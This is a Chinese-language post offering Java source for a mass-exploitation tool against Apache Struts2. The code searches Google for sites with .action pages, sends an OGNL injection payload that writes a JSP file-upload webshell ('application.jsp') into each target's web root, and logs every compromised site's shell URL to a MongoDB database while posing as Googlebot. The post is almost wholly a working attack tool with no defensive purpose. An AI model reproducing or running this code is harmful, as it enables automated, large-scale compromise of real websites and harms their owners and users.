Struts2漏洞批量GetShell到MongoDb数据库
这个很简单的,改下main的str的关键字就可以自动getshell并倒入mongodb数据库。
[只需要添加jsoup和mongodb的jar包]
import java.io.IOException;
import java.net.URL;
import java.net.URLConnection;
import java.net.UnknownHostException;
import java.util.ArrayList;
import java.util.List;
import java.util.logging.Logger;
import java.util.regex.Pattern;
import org.jsoup.Jsoup;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import com.mongodb.BasicDBObject;
import com.mongodb.DB;
import com.mongodb.DBCollection;
import com.mongodb.DBObject;
import com.mongodb.Mongo;
public class StrutsTools {
private static String GETSHELLPOC1 = "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22application.jsp%22).replaceAll(\"\\\\\\\\\",\"/\"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3C%25if%28request.getParameter%28%22f%22%29%21%3Dnull%29%7B%28new%20java.io.FileOutputStream%28application.getRealPath%28%22%2F%22%29%2Brequest.getParameter%28%22f%22%29%29%29.write%28request.getParameter%28%22t%22%29.getBytes%28%29%29%3B%7Delse%7Bout.println%28%22%5B%2Fok%5D%22%29%3B%7D%25%3E";
public void log(String log){
Logger logger = Logger.getLogger("s2");
logger.info(log);
}
public void toSave(DBObject obj) {
try {
DB db = new Mongo("localhost", 27017).getDB("shell");
DBCollection conn = db.getCollection("shell");
conn.insert(obj);
} catch (UnknownHostException e) {
e.printStackTrace();
}
}
public void doGet(String url) {
try {
System.out.println(url);
URL realUrl = new URL(url);
URLConnection connection = realUrl.openConnection();
connection.setConnectTimeout(3000);
connection.setReadTimeout(3000);
connection.connect();
connection.getInputStream();
} catch (Exception e) {
log(e.toString());
}
}
/**
* 简单的转换下google的编码
* @param url
* @return
*/
public String toURL(String url){
url = url.replace("%3F", "?");
url = url.replace("%3f", "?");
url = url.replaceAll("%3d", "=");
url = url.replaceAll("%3D", "=");
url = url.replaceAll("%26", "&");
return url;
}
public void getShell(String url){
try {
doGet(url+(url.indexOf("?")!=-1?"&":"?")+GETSHELLPOC1);
URL l = new URL(url);
String host = url.substring(0,url.indexOf(l.getFile()));
Document doc = Jsoup.connect(host+"/application.jsp").userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(3000).get();
if(doc.toString().indexOf("[/ok]")!=-1){
DBObject obj = new BasicDBObject();
obj.put("shell", host+"/application.jsp");
toSave(obj);
}
} catch (IOException e) {
log(e.toString());
}
}
public void test(String url){
try {
Document doc = Jsoup.connect(url).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(3000).get();
Elements element = doc.getElementsByClass("r");
List<String> ls = new ArrayList<String>();
for(Element e : element){
Elements a = e.getElementsByTag("a");
for(Element b : a){
String s = b.attr("href").replace("/url?q=", "");
URL u = new URL(s);
String host = s.substring(0,s.indexOf(u.getFile()));
if(!Pattern.compile(host).matcher(ls.toString()).find()){
ls.add(s);
}
}
}
// System.out.println(ls.toString());
for(String s:ls){
getShell(toURL(s.substring(0,s.indexOf("&sa=U&ei="))));
}
} catch (IOException e) {
log(e.toString());
}
}
public static void main(String[] args) {
String str = "passwordRecover.action,login,show,article,list,shop,admin,service,index";
String[] s = str.split(",");
for(String b:s){
for (int i = 0; i < 5; i++) {
String url = "http://www.google.ws/search?q=filetype:action+inurl:"+b+"&num=100&newwindow=1&ei=eOl3UqXUL8eTiAfHiYDICw&start="+(i*100)+"&sa=N&biw=1366&bih=578";
StrutsTools p = new StrutsTools();
p.test(url);
}
}
}
}